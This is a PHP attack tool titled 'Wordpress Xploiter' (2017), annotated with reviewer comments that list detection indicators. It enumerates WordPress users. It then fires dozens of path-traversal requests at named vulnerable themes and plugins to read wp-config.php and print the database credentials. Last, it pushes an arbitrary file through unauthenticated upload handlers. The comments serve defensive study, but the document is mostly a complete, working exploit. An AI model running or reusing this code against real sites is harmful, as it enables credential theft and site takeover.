AZZATSSINS_CYBERSERK

Wordpress Xploiter

Jun 9th, 2017
<?php
// Attacker-side CLI tool ("Wordpress Xploiter", 2017). Given a target base URL
// (argv[1]) and a local file (argv[2]) it (1) fingerprints the WordPress version
// and first author name, (2) walks a list of known theme/plugin file-download
// endpoints to read wp-config.php and print the DB credentials, and (3) pushes
// argv[2] through known unauthenticated upload handlers.
//
// Reviewer note: every line in this file executes on the operator's machine,
// never on the target; the @-suppression and ini_set calls below only hide PHP
// diagnostics on the operator's console. The value of this listing to a
// defender is the indicators it carries — fixed User-Agent strings, probe paths,
// query parameter names and multipart field names — which are usable verbatim
// in WAF/SIEM rules.
@session_start();                   // unused: nothing below reads $_SESSION
@error_reporting(0);                // hide all notices/warnings (e.g. undefined array offsets)
@ini_set('error_log',NULL);         // no error log file on the operator host
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);   // unbounded runtime for the probe loops
@ini_set('display_errors', 0);
@set_time_limit(0);
/*
AUTHOR : AZZATSSINS CYBERSERKERS
*/
  12.  
// Upload helper used by the final stage: POSTs the local file $fl as a
// multipart field named $anu to the URL $azx and echoes the raw response body.
//   $azx  full URL of the upload handler
//   $anu  multipart field name the handler expects ("file", "Filedata",
//         "qqfile", "FileToUpload" or "file[]", chosen by the operator)
//   $fl   local path of the file to send (argv[2] at every call site)
// The "@path" prefix is the legacy PHP/cURL file-upload convention.
// TLS peer and hostname verification are both disabled, so targets with
// self-signed or mismatched certificates are still reached; redirects are
// followed. No User-Agent is set in this helper (the fixed MSIE strings are
// only used by the probe requests elsewhere in the file).
// Detection: a multipart POST carrying one of the field names above to one
// of the upload paths listed in the $expl arrays at the bottom of the file.
function curl($azx,$anu,$fl){
$post = array($anu => "@$fl");
$ch2 = curl_init ($azx);
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);  // no certificate validation
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
echo curl_exec ($ch2);}
echo "   ___ ________  ___ ___________________  ______\n  / _ /_  /_  / / _ /_  __/ __/ __/  _/ |/ / __/\n / __ |/ /_/ /_/ __ |/ / _\ \_\ \_/ //    /\ \  \n/_/ |_/___/___/_/ |_/_/ /___/___/___/_/|_/___/  \n                                                \n";  // ASCII-art banner
$azz=$argv[1];   // target base URL; every probe below appends "/<path>" to it
$fl=$argv[2];    // local file passed to curl() in the upload stage
// Stage 1: fetch the homepage (headers included in $get) with a fixed, dated
// User-Agent. Detection: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
// requesting "/" followed within seconds by "/?author=1" from the same source.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$azz");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$get = curl_exec($ch);
curl_close($ch);
    // Version fingerprint: matches the generator <meta> tag text up to its "/>".
    if(preg_match("#WordPress (.*?)/>#", $get, $version)){
    $str = str_replace('/>', "", $version[0]);
    $str = str_replace('"', "", $str);

    // Username enumeration via the /?author=1 redirect: takes the resulting
    // <title> and splits on "|", assuming a "<display name> | <site name>"
    // title. $user[1] is undefined when no <title> matched; the notice is
    // hidden by error_reporting(0). Only runs when the version regex matched.
    $users = @file_get_contents("$azz/?author=1");
    preg_match('/<title>(.*?)<\/title>/si',$users,$user);
    $wpuser = explode('|',$user[1]);

echo " \n_______________________________________________________________\n";
echo "Site : ".$azz."\n WP User : ".$wpuser[0]."\n Version : ".$str."\n"; }
// Stage 2a: GET-based wp-config.php disclosure probes. Each entry is a known
// theme/plugin download or image-proxy endpoint with its file parameter pointed
// at wp-config.php via "../" traversal. Entries mix a leading "/" with none, so
// the "$azz/$exploit" join produces "//" for some of them.
// NOTE(review): the array literal is wrapped mid-string after
// "download_file=../../../" in this paste, so that one entry carries a newline
// in the URL as written here — almost certainly a paste artifact, left as-is.
// Detection: GET requests whose query string contains "wp-config.php" and/or
// "../" to any of these paths, sent with User-Agent
// "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)", many in quick succession.
$expl = array("/wp-admin/admin-ajax.php?action=importCSVIPCloud&filename=../ ../../wp-config.php","/wp-content/plugins/wp-imagezoom/download.php?file=../../../wp-config.php","/wp-content/themes/felis/download.php?file=../wp-config.php","/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php","/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php","wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php","wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php","wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php","wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php","wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php","wp-content/force-download.php?file=../wp-config.php","wp-content/themes/lote27/download.php?download=../../../wp-config.php","wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php","/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php","/wp-content/themes/markant/download.php?file=../../wp-config.php","/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php","/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php","/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php","/wp-admin/admin-ajax.php?action=fe_get_sv_html&video=../wp-config.php","/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php","/wp-content/themes/yakimabait/download.php?file=../wp-config.php","/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php","/wp-content/themes/estrutura-basica/scripts/download.php?arquivo=../../wp-config.php","/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../
wp-config.php","/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php","/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php","/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php","/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php","/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php","/wp-content/themes/Newspapertimes_1/download.php?filename=../../../wp-config.php","/wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php","/wp-content/themes/jarida/download.php?uri=../../../wp-config.php","/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php","/wp-content/themes/tess/download.php?file=../../../wp-config.php","/wp-content/themes/ypo-theme/download.php?download=../../../wp-config.php","/wp-content/themes/business-essentials-wp/download.php?file=../../../../wp-config.php","/wp-content/themes/abeta/download.php?arquivo=../../../wp-config.php","/wp-content/themes/wetzel/file-download.php?file=../../../wp-config.php","/wp-content/themes/mRoriz/download.php?filename=../../../../wp-config.php","/wp-content/themes/stt/noticias/download.php?file=../../../../wp-config.php","/wp-content/themes/githook/themessageofchristmas/pdf/download.php?file=../../../../../wp-config.php","/wp-content/themes/icelegacy/download.php?f=../../../wp-config.php","/wp-content/themes/hustle/down.php?f=../../../wp-config.php","/wp-content/themes/copthorne3.0/includes/year3/process.php?file=../../../../../wp-config.php","/wp-content/themes/akademie/download.php?pfad=../../../wp-config.php","/wp-content/themes/gt/download.php?file=../../../wp-config.php","/wp-content/themes/twentyeleven/download.php?file=../../../wp-config.php","/wp-download.php?file=wp-config.php");
foreach($expl as $exploit){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$azz/$exploit");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$xp = curl_exec ($ch);
curl_close($ch);
// Success test: the body contains "DB_USER". The four regexes only match the
// single-quoted define('X', 'y') form; double-quoted defines yield empty captures.
// The loop does not stop on a hit, so every probe is sent regardless.
if(preg_match("#DB_USER#i",$xp)){
preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}\n";
preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
echo "DB_USER:{$DB_USER[1]}\n";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}\n";
preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}\n";
}}
// Stage 2b: POST-based disclosure probe against the "dl-skin.php" script shipped
// with a family of themes. The traversal payload travels in the POST body, not
// the query string, so query-string-only WAF rules miss it.
// Detection: POST to */lib/scripts/dl-skin.php with body
// "_mysite_download_skin=../../../../../wp-config.php" and User-Agent
// "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)".
$lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php","wp-content/themes/dejavu/lib/scripts/dl-skin.php");
foreach($lt as $l){
// NOTE: this reassigns $azz (the target base URL) on every iteration, so each
// later probe here — and the whole upload stage below — is built on the
// previous probe URL rather than the original argv[1] value.
$azz = "$azz/$l";
$process = curl_init($azz);
curl_setopt($process, CURLOPT_TIMEOUT, 30);            // the only request in the file with a timeout
curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
curl_setopt($process, CURLOPT_HEADER, TRUE);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
$return = curl_exec($process);                          // handle is never closed
// Same credential extraction as stage 2a; this loop does stop on the first hit.
if(preg_match("#DB_USER#i",$return)){
preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}\n";
preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
echo "DB_USER:{$DB_USER[1]}\n";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}\n";
preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}\n";
break;
echo " \n_______________________________________________________________</br>";  // unreachable: follows break
}
}
// Stage 3: interactive upload. The operator picks the multipart field name;
// each choice maps to a list of upload handlers known to accept that field.
// For every path the tool sends a HEAD request (CURLOPT_NOBODY, no User-Agent
// set) and treats HTTP 200 as "handler present" — a weak test, since hosts that
// answer 200 for unknown paths will trigger an upload attempt on every entry.
// On 200 it calls curl() to POST argv[2] under the chosen field name.
// Note $azz may already have been rewritten by the dl-skin loop above, so the
// URLs built here can include a stale probe path. Inputs other than 1-5 do
// nothing (no default branch); the comparison is loose, so "1" == 1 holds.
// Detection: HEAD to one of these paths immediately followed by a multipart
// POST to the same path from the same source.
echo "\nChoose Post Name: \n1 : file\n2 : Filedata\n3 : qqfile\n4 : FileToUpload\n5 : file[]\n";
echo "\nPost Name: ";
$pn=trim(fgets(STDIN,1024));
if($pn == 1){
// Field "file". NOTE(review): the array literal is wrapped mid-string after
// "/wp-content/plugins/" in this paste, so that entry contains a newline as
// written here — almost certainly a paste artifact, left as-is.
$expl = array("/jm-ajax/upload_file/","/wp-content/plugins/
Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php","/wp-content/themes/honestkim/js/redactor/demo/scripts/file_upload.php","/wp-content/plugins/html5avmanager/lib/uploadify/custom.php");
foreach($expl as $vuln){
$azx = $azz.$vuln;
$ch = curl_init($azx);
curl_setopt($ch, CURLOPT_NOBODY, true);   // HEAD-style existence probe
curl_exec($ch);
$status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($status_code==200)
{
echo "\n[!] Found : ".$azx."\n";
curl($azx,"file",$fl);
}}
}elseif($pn == 2){
// Field "Filedata": mostly themify-ajax.php?upload=1 across Themify themes.
$expl = array("/wp-content/themes/dandelion/functions/upload-handler.php","/wp-content/plugins/wordpress-member-private-conversation/doupload.php","/wp-content/themes/Elemin/themify/themify-ajax.php?upload=1","/wp-content/themes/Bloggie/themify/themify-ajax.php?upload=1","/wp-content/themes/Tisa/themify/themify-ajax.php?upload=1","/wp-content/themes/Funki/themify/themify-ajax.php?upload=1","/wp-content/themes/Pinboard/themify/themify-ajax.php?upload=1","/wp-content/themes/Folo/themify/themify-ajax.php?upload=1","/wp-content/themes/grido/themify/themify-ajax.php?upload=1","/wp-content/themes/Suco/themify/themify-ajax.php?upload=1","/wp-content/themes/iThemes2/themify/themify-ajax.php?upload=1","/wp-content/themes/fullpane/themify/themify-ajax.php?upload=1","/wp-content/themes/simfo/themify/themify-ajax.php?upload=1","/wp-content/themes/rezo/themify/themify-ajax.php?upload=1","/wp-content/themes/bizco/themify/themify-ajax.php?upload=1","/wp-content/themes/minshop/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-landing/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-elegant/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-base/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-corporate/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-music/themify/themify-ajax.php?upload=1","/wp-content/themes/postline/themify/themify-ajax.php?upload=1","/wp-content/themes/newbasic/themify/themify-ajax.php?upload=1","/wp-content/plugins/viral-optins/api/uploader/file-uploader.php");
foreach($expl as $vuln){
$azx = $azz.$vuln;
$ch = curl_init($azx);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_exec($ch);
$status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($status_code==200)
{
echo "\n[!] Found : ".$azx."\n";
curl($azx,"Filedata",$fl);
}}}elseif($pn == 3){
// Field "qqfile" (valums-style uploaders). The complete-gallery-manager
// entry is listed twice, so it is probed twice.
$expl = array("/wp-content/plugins/complete-gallery-manager/frames/upload-images.php","/wp-content/plugins/complete-gallery-manager/frames/upload-images.php","/wp-content/themes/area53/framework/_scripts/valums_uploader/php.php","/wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php");
foreach($expl as $vuln){
$azx = $azz.$vuln;
$ch = curl_init($azx);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_exec($ch);
$status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($status_code==200)
{
echo "\n[!] Found : ".$azx."\n";
curl($azx,"qqfile",$fl);
}}
}elseif($pn == 4){
// Field "FileToUpload".
$expl = array("/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php","/wp-content/plugins/mac-dock-gallery/upload-file.php","/wp-content/themes/kernel-theme/functions/upload-handler.php","/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php","/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php");
foreach($expl as $vuln){
$azx = $azz.$vuln;
$ch = curl_init($azx);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_exec($ch);
$status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($status_code==200)
{
echo "\n[!] Found : ".$azx."\n";
curl($azx,"FileToUpload",$fl);
}}
}elseif($pn == 5){
// Field "file[]" (jQuery-File-Upload style server/php handlers).
$expl = array("/wp-content/themes/organizer/lib_upload/server/php/","/wp-content/plugins/formcraft/file-upload/server/content/upload.php");
foreach($expl as $vuln){
$azx = $azz.$vuln;
$ch = curl_init($azx);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_exec($ch);
$status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($status_code==200)
{
echo "\n[!] Found : ".$azx."\n";
curl($azx,"file[]",$fl);
}}}